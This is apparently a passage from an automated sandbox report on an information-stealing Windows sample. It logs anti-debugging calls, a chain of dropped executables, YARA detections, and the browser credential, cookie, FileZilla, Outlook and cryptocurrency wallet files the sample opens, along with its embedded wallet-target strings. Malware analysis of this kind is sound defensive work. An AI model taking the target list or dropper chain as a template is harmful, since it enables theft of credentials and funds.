dress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_004195E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00419160 mov eax, dword ptr fs:[00000030h] 0_2_00419160
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,memcpy,InternetCloseHandle,InternetCloseHandle, 0_2_00405000
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041C8D9 SetUnhandledExceptionFilter, 0_2_0041C8D9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0041ACFA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041A718 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0041A718
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C70B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6C70B66C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C70B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C70B1F7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C8BAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C8BAC62
Source: C:\Users\user\Desktop\file.exe Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: file.exe PID: 6720, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 9fa327eb6c.exe PID: 7968, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 9fa327eb6c.exe PID: 4744, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004190A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_004190A0
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingIJEGHJECFC.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userAAKKKEBFCG.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\RoamingIJEGHJECFC.exe "C:\Users\user\AppData\RoamingIJEGHJECFC.exe"
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\userAAKKKEBFCG.exe "C:\Users\userAAKKKEBFCG.exe"
Source: C:\Users\userAAKKKEBFCG.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe "C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe "C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe"
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: 8e8f4571c5.exe, 00000018.00000002.3307114026.0000000000622000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3307370321.0000000000622000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: userAAKKKEBFCG.exe, userAAKKKEBFCG.exe, 00000008.00000002.2309403161.000000000021F000.00000040.00000001.01000000.0000000B.sdmp, axplong.exe, 0000000F.00000002.2347284132.00000000005CF000.00000040.00000001.01000000.0000000F.sdmp, axplong.exe, 00000010.00000002.2347343665.00000000005CF000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: Program Manager
Source: firefox.exe, 0000001F.00000002.2949519005.000000114463B000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: ?Progman
Source: RoamingIJEGHJECFC.exe, RoamingIJEGHJECFC.exe, 00000005.00000002.2283548107.0000000000533000.00000040.00000001.01000000.00000009.sdmp, explorti.exe, explorti.exe, 00000009.00000002.2317563389.0000000000793000.00000040.00000001.01000000.0000000C.sdmp, explorti.exe, 0000000B.00000002.2318335961.0000000000793000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: 9Program Manager
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C70B341 cpuid 0_2_6C70B341
Source: C:\Users\user\Desktop\file.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_00417630
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00417420 GetProcessHeap,HeapAlloc,GetLocalTime,wsprintfA, 0_2_00417420
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004172F0 GetProcessHeap,HeapAlloc,GetUserNameA, 0_2_004172F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004174D0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA, 0_2_004174D0

Stealing of Sensitive Information

Source: Yara match File source: 9.2.explorti.exe.5a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.axplong.exe.3d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.userAAKKKEBFCG.exe.20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RoamingIJEGHJECFC.exe.340000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.axplong.exe.3d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.explorti.exe.5a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.explorti.exe.5a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.axplong.exe.3d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000003.2276983126.0000000005060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2347124654.00000000003D1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.2304525460.00000000052E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2347246471.00000000003D1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2318152598.00000000005A1000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2317440322.00000000005A1000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2277575400.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.2304691515.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2268996704.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.2625588301.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.2242381283.0000000004AA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.3307066431.00000000005A1000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2283337315.0000000000341000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2630631492.0000000004BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.3307509620.00000000003D1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2309282789.0000000000021000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2829021597.000000000270B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2496187977.0000000002757000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.2718500578.0000000002567000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.2994798598.000000000263A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 6720, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 9fa327eb6c.exe PID: 7968, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 9fa327eb6c.exe PID: 4744, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: file.exe PID: 6720, type: MEMORYSTR
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: file.exe String found in binary or memory: us|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|M
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: file.exe String found in binary or memory: us|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|M
Source: file.exe String found in binary or memory: \jaxx\Local Storage\
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: file.exe String found in binary or memory: us|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|M
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: file.exe String found in binary or memory: passphrase.json
Source: file.exe String found in binary or memory: \jaxx\Local Storage\
Source: file.exe String found in binary or memory: \Ethereum\
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: file.exe, 00000000.00000002.2496187977.00000000027A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 185.215.113.16fons\AppData\Roaming\Binance\simple-storage.json
Source: file.exe String found in binary or memory: Ethereum
Source: file.exe String found in binary or memory: file__0.localstorage
Source: file.exe String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: file.exe String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe String found in binary or memory: ltiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.js
Source: file.exe String found in binary or memory: us|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|M
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
Source: 8e8f4571c5.exe, 0000001C.00000002.3338850451.0000000001FEA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WIN_XP
Source: 8e8f4571c5.exe, 0000001C.00000002.3307370321.0000000000622000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: 8e8f4571c5.exe, 00000018.00000002.3338463665.0000000001FE1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WIN_XP4
Source: Yara match File source: Process Memory Space: file.exe PID: 6720, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 00000019.00000002.2829021597.000000000270B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2496187977.0000000002757000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.2718500578.0000000002567000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.2994798598.000000000263A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 6720, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 9fa327eb6c.exe PID: 7968, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 9fa327eb6c.exe PID: 4744, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: file.exe PID: 6720, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C8C0C40 sqlite3_bind_zeroblob, 0_2_6C8C0C40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C8C0D60 sqlite3_bind_parameter_name, 0_2_6C8C0D60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7E8EA0 sqlite3_clear_bindings, 0_2_6C7E8EA0